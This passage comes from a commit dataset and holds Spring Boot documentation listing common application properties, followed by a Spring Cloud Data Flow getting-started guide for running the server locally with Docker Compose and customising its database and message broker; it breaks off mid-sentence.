({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.char-set=UTF-8\n\tspring.freemarker.contentType=text\/html\n\tspring.freemarker.exposeRequestAttributes=false\n\tspring.freemarker.exposeSessionAttributes=false\n\tspring.freemarker.exposeSpringMacroHelpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.requestContextAttribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/\n\tspring.freemarker.viewNames= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.char-set=UTF-8\n\tspring.groovy.template.configuration.*= # See Groovy's TemplateConfiguration\n\tspring.groovy.template.contentType=text\/html\n\tspring.groovy.template.prefix=classpath:\/templates\/\n\tspring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.char-set=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.expose-Request-attributes=false\n\tspring.velocity.expose-Session-attributes=false\n\tspring.velocity.expose-Spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cacheSeconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored=false\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if can't be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27107)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongo.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties}])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties}])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version= 1 # version to start migration\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.virtual-host=\n\tspring.rabbitmq.dynamic=\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# HornetQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchDatabaseInitializer.{sc-ext}[BatchDatabaseInitializer])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding=false\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # default to '\/'\n\tmanagement.add-application-context-header= # default to true\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=false\n\tendpoints.health.enabled=true\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ddd2043909e67eb5d4348f98a471cf4addf0b7a","subject":"Updated doc to fix version replacement in shell download command","message":"Updated doc to fix version replacement in shell download command\n\nA missing tag was preventing the substitution of the repository name and\nversion of SCDF in the command for downloading the shell. This commit\nfixes that.\n","repos":"mminella\/spring-cloud-data,cppwfs\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-data,cppwfs\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,ghillert\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,mminella\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow","old_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started-local.adoc","new_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started-local.adoc","new_contents":"[[getting-started-local]]\n== Getting Started - Local\n\n[partintro]\n--\nIf you are getting started with Spring Cloud Data Flow, this section is for you.\nIn this section, we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions.\nYou can find a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe then build an introductory Spring Cloud Data Flow application, discussing some core principles as we go.\n--\n\n\n[[getting-started-local-system-requirements]]\n=== System Requirements\n\nYou need Java 8 to run and to build you need to have Maven.\n\nBoth the Data Flow Server and Skipper Server need to have an RDBMS installed. The Data Flow Server stores stream and task definitions. It also stores the execution state of deployed tasks. The Skipper server stores the execution state of deployed streams.\n\nBy default, the Data Flow server uses embedded H2 database for this purpose but you can easily configure the server to use another external database.\n\nFor the deployed streams applications communicate a messaging middleware product needs to be installed.\nWe provide prebuilt stream applications that use link:http:\/\/www.rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka], however other https:\/\/cloud.spring.io\/spring-cloud-stream\/#binder-implementations[messaging middleware products] are supported.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker]]\n=== Getting Started with Docker Compose\n\nSpring Cloud Data Flow provides a Docker Compose file to let you quickly bring up Spring Cloud Data Flow, Skipper, and the Apache Kafka broker, instead of having to install them manually.\n\nNOTE: We recommended that you upgrade to the link:https:\/\/docs.docker.com\/compose\/install\/[latest version] of Docker before running the `docker-compose` command. We have tested it against Docker Engine version `18.09.2`\n\nThe following sections describe how to get started with Docker Compose:\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-download]]\n=== Downloading the Docker Compose File\n\nBefore you do anything else, you need to download the Docker Compose file. To do so:\n\n. Download the Spring Cloud Data Flow Server Docker Compose file:\n+\n====\n[source,bash,subs=attributes]\n----\n$ wget https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml\n----\n====\n\nNOTE: If the `wget` command is unavailable, you can use `curl` or another platform-specific utility. Alternatively, you can navigate to https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml[https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml] in a web browser and save the contents. Ensure the downloaded filename is `docker-compose.yml`.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-starting]]\n=== Starting Docker Compose\n\nTo get started, you need to start Docker Compose. To do so:\n\n. In the directory where you downloaded `docker-compose.yml`, start the system, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ export DATAFLOW_VERSION={local-server-image-tag}\n$ export SKIPPER_VERSION={skipper-version}\n$ docker-compose up\n----\n====\n\nThe `docker-compose.yml` file defines `DATAFLOW_VERSION` and `SKIPPER_VERSION` variables, so that those values can be easily changed. The preceding commands first set the `DATAFLOW_VERSION` and `SKIPPER_VERSION` to use in the environment. Then `docker-compose` is started.\n\nYou can also use a shorthand version that exposes only the `DATAFLOW_VERSION` and `SKIPPER_VERSION` variables to the `docker-compose` process (rather than setting it in the environment), as follows:\n\n====\n[source,bash,subs=attributes]\n----\n$ DATAFLOW_VERSION={local-server-image-tag} SKIPPER_VERSION={skipper-version} docker-compose up\n----\n====\n\nIf you use Windows, environment variables are defined by using the `set` command. To start the system on Windows, enter the following commands:\n\n====\n[source,bash,subs=attributes]\n----\nC:\\ set DATAFLOW_VERSION={local-server-image-tag}\nC:\\ set SKIPPER_VERSION={skipper-version}\nC:\\ docker-compose up\n----\n====\n\nNOTE: By default, Docker Compose use locally available images.\nFor example, when using the `latest` tag, run `docker-compose pull` prior to `docker-compose up` to ensure the latest image is downloaded.\n\nSpring Cloud Data Flow is ready for use once the `docker-compose` command stops emitting log messages.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-launch]]\n=== Launching Spring Cloud Data Flow\n\nNow that docker compose is up, you can launch the Spring Cloud Data Flow Dashboard. To do so, in your browser, navigate to the link:http:\/\/localhost:9393\/dashboard[Spring Cloud Data Flow Dashboard].\nBy default, the latest GA releases of Stream and Task applications are imported automatically.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-create-stream]]\n=== Creating a Stream\n\nTo create a stream:\n\n. In the menu, click *Streams*.\n. Click the *Create Stream(s)* button.\n+\nThe screen changes to the following image:\n+\n.Create Stream Page\nimage::images\/dataflow-create-stream-start.png[Create Stream Page, scaledwidth=\"60%\"]\n. In the text area, type `time | log`.\n. Click *Create Stream*.\n. Enter `ticktock` for the stream name, as shown in the following image:\n+\n.Creating a Stream\nimage::images\/dataflow-stream-create.png[Creating a Stream, scaledwidth=\"60%\"]\n. Click \"Create the stream\" button.\n+\nThe Definitions page appears.\n+\n.Definitions Page\nimage::images\/dataflow-definitions-page.png[Definitions Page, scaledwidth=\"60%\"]\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-deploy-stream]]\n=== Deploying a Stream\n\nNow that you have defined a stream, you can deploy it. To do so:\n\n. Click the play (deploy) button next to the \"`ticktock`\" definition that you created in the previous section.\n+\n.Initiate Deployment of a Stream\nimage::images\/dataflow-stream-definition-deploy.png[Creating a Stream, scaledwidth=\"60%\"]\n+\nThe UI shows the available properties that can be applied to the apps in the \"`ticktock`\" stream.\nThis example shown in the following image uses the defaults:\n+\n.Deployment Page\nimage::images\/dataflow-deploy-ticktock.png[Deloyment Page, scaledwidth=\"60%\"]\n. Click the *Deploy Stream* button.\n+\nThe UI returns to the Definitions page.\n+\nThe stream is now in \"`deploying`\" status, and its status becomes \"`deployed`\" when it is finished deploying.\nYou may need to refresh your browser to see the updated status.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-viewing-stream-logs]]\n=== Viewing Stream Logs\n\nOnce a stream is deployed, you can view its logs. To do so:\n\n. Click *Runtime* in the menu.\n. Click \"`ticktock.log`\".\n. Copy the path in the \"`stdout`\" text box on the dashboard\n. In another console window, type the following, replacing `\/path\/from\/stdout\/textbox\/in\/dashboard` with the value you copied in the previous step:\n+\n====\n[source,bash,subs=attributes]\n----\n$ docker exec -it skipper tail -f \/path\/from\/stdout\/textbox\/in\/dashboard\n----\n====\n+\nThe output of the log sink appears in the new window, printing a timestamp once per second.\n. When you have seen enough of that output, press Ctrl+C to end the `tail` command.\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-deleting-stream]]\n=== Deleting a Stream\n\nNow you can delete the stream you created. To do so:\n\n. Click *Streams* in the menu.\n. Click the down chevron on the \"`ticktock`\" row.\n. Click the *Destroy Stream*.\n. When prompted for confirmation, click *Destroy Stream Definition(s)*.\n\n=== Destroying the Quick Start Environment\n\nYou have finished the getting started guide for using Docker locally, so you can now shut down the environment you created by running `docker-compose up`. To do so:\n\n. Open a new terminal window.\n. Change directory to the directory in which you started (where the `docker-compose.yml` file is located).\n. Run the following command:\n+\n====\n[source,bash,subs=attributes]\n----\n$ DATAFLOW_VERSION={local-server-image-tag} SKIPPER_VERSION={skipper-version} docker-compose down\n----\n====\n+\n(You need to specify the `DATAFLOW_VERSION` and the `SKIPPER_VERSION` because you are running the command in a separate terminal window. The `export` commands you used earlier set the variables for only that terminal window, so those values are not found in the new terminal window. If all else fails, you can shut it down with Ctrl+C. Don't do that for non-demo instances, though.s)\n\nNOTE: Some stream applications may open a port, for example `http --server.port=`. By default, a port range of `9000-9010` is exposed from the container to the host. If you would need to change this range, you can modify the `ports` block of the `dataflow-server` service in the `docker-compose.yml` file.\n\n\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker]]\n\n==== Spring Cloud Data Flow Shell\n\nFor convenience and as an alternative to using the Spring Cloud Data Flow Dashboard, Spring Cloud Data Flow Shell is also included in the springcloud\/spring-cloud-dataflow-server Docker image.\nTo use it, open another console window and type the following:\n\n====\n[source,bash]\n----\n$ docker exec -it dataflow-server java -jar shell.jar\n----\n====\n\nUsing Spring Cloud Data Flow Shell is further described in <<shell,Shell>>.\n\n==== Spring Cloud Data Flow Monitoring\n\nBy default, the Data Flow `docker-compose` configures Stream monitoring with InfluxDB and pre-built dashboards for Grafana.\n\nFor further instructions about Data Flow monitoring, see <<streams-monitoring-local-influx,Streams Monitoring InfluxDB >>.\n\nimage::{dataflow-asciidoc}\/images\/grafana-influxdb-scdf-streams-dashboard.png[Grafana InfluxDB Dashboard, scaledwidth=\"50%\"]\n\n==== Docker Compose Customization\n\nOut of the box, Spring Cloud Data Flow uses the H2 embedded database for storing state and Kafka for communication.\nYou can make customizations to these components by editing the `docker-compose.yml` file. To do so:\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker-mysql]]\n===== Using MySQL Rather than the H2 Embedded Database\n\nYou can use MySQL rather than the H2 embedded database.\nTo do so:\n\n. Add the following configuration under the `services` section:\n+\n====\n[source,yaml,subs=attributes]\n----\n mysql:\n image: mysql:5.7.25\n environment:\n MYSQL_DATABASE: dataflow\n MYSQL_USER: root\n MYSQL_ROOT_PASSWORD: rootpw\n expose:\n - 3306\n----\n====\n\n. Add the following entries to the `environment` block of the `dataflow-server` service definition:\n+\n====\n[source,yaml,subs=attributes]\n----\n - spring.datasource.url=jdbc:mysql:\/\/mysql:3306\/dataflow\n - spring.datasource.username=root\n - spring.datasource.password=rootpw\n - spring.datasource.driver-class-name=org.mariadb.jdbc.Driver\n----\n====\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker-rabbitmq]]\n===== Using RabbitMQ Instead of Kafka for Communication\n\nYou can use RabbitMQ rather than Kafka for communication. To do so:\n\n. Replace the following configuration under the `services` section:\n+\n====\n[source,yaml,subs=attributes]\n----\n kafka:\n image: wurstmeister\/kafka:2.11-0.11.0.3\n expose:\n - \"9092\"\n environment:\n - KAFKA_ADVERTISED_PORT=9092\n - KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181\n - KAFKA_ADVERTISED_HOST_NAME=kafka\n zookeeper:\n image: wurstmeister\/zookeeper\n expose:\n - \"2181\"\n----\n====\n+\nWith the following:\n+\n====\n[source,yaml,subs=attributes]\n----\n rabbitmq:\n image: rabbitmq:3.7\n expose:\n - \"5672\"\n----\n====\n\n. In the `dataflow-server` services configuration block, add the following `environment` entry:\n+\n====\n[source,yaml,subs=attributes]\n----\n - spring.cloud.dataflow.applicationProperties.stream.spring.rabbitmq.host=rabbitmq\n----\n====\n\n. Replace the following:\n+\n====\n[source,yaml,subs=attributes]\n----\n depends_on:\n - kafka\n----\n====\n+\nWith:\n+\n[source,yaml,subs=attributes]\n====\n----\n depends_on:\n - rabbitmq\n----\n====\n\n. Modify the `app-import` service definition `command` attribute to replace `http:\/\/bit.ly\/Einstein-SR2-stream-applications-kafka-maven` with `http:\/\/bit.ly\/Einstein-SR2-stream-applications-rabbit-maven`.\n\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker-mysql]]\n===== Enabling App Starters from the Host\n\nYou can enable `app starters` registration directly from the host machine.\nTo do so:\n\n. Mount the source host folders to the `dataflow-server` container.\n+\nFor example, if the `my-app.jar` is in the `\/thing1\/thing2\/apps` folder on your host machine, add the following `volumes` block to the `dataflow-server` service definition:\n+\n[source,yaml,subs=attributes]\n====\n----\n dataflow-server:\n image: springcloud\/spring-cloud-dataflow-server:${DATAFLOW_VERSION}\n container_name: dataflow-server\n ports:\n - \"9393:9393\"\n environment:\n - spring.cloud.dataflow.applicationProperties.stream.spring.cloud.stream.kafka.binder.brokers=kafka:9092\n - spring.cloud.dataflow.applicationProperties.stream.spring.cloud.stream.kafka.binder.zkNodes=zookeeper:2181\n volumes:\n - \/foo\/bar\/apps:\/root\/apps\n----\n====\n\nThis configuration provides access to the `my-app.jar` (and the other files in the folder) from within container's `\/root\/apps\/` folder. See the https:\/\/docs.docker.com\/compose\/compose-file\/compose-file-v2\/[compose-file reference] for further configuration details.\n\nNOTE: The explicit volume mounting couples docker-compose to your host's file system, limiting the portability to other machines and operating systems. Unlike `docker`, `docker-compose` does not allow volume mounting from the command line (for example, no `-v` parameter). Instead, you can define a placeholder environment variable (such as `HOST_APP_FOLDER`) in place of the hardcoded path by using `- ${HOST_APP_FOLDER}:\/root\/apps` and setting this variable before starting docker-compose.\n\nOnce you mount the host folder, you can register the app starters (from `\/root\/apps`), with the SCDF https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#shell[Shell] or https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#dashboard-apps[Dashboard] by using the `file:\/\/` URI schema.\nThe following example shows how to do so:\n\n====\n[source,bash,subs=attributes]\n----\ndataflow:>app register --type source --name my-app --uri file:\/\/root\/apps\/my-app-1.0.0.RELEASE.jar\n----\n====\n\nNOTE: You also need to use `--metadata-uri` if the metadata jar is available in the \/root\/apps.\n\nTo access the host's local maven repository from within the `dataflow-server` container, you should mount the host maven local repository (defaults to `~\/.m2` for OSX and Linux and `C:\\Documents and Settings\\{your-username}\\.m2` for Windows) to a `dataflow-server` volume called `\/root\/.m2\/`. For MacOS or Linux host machines, this looks like the 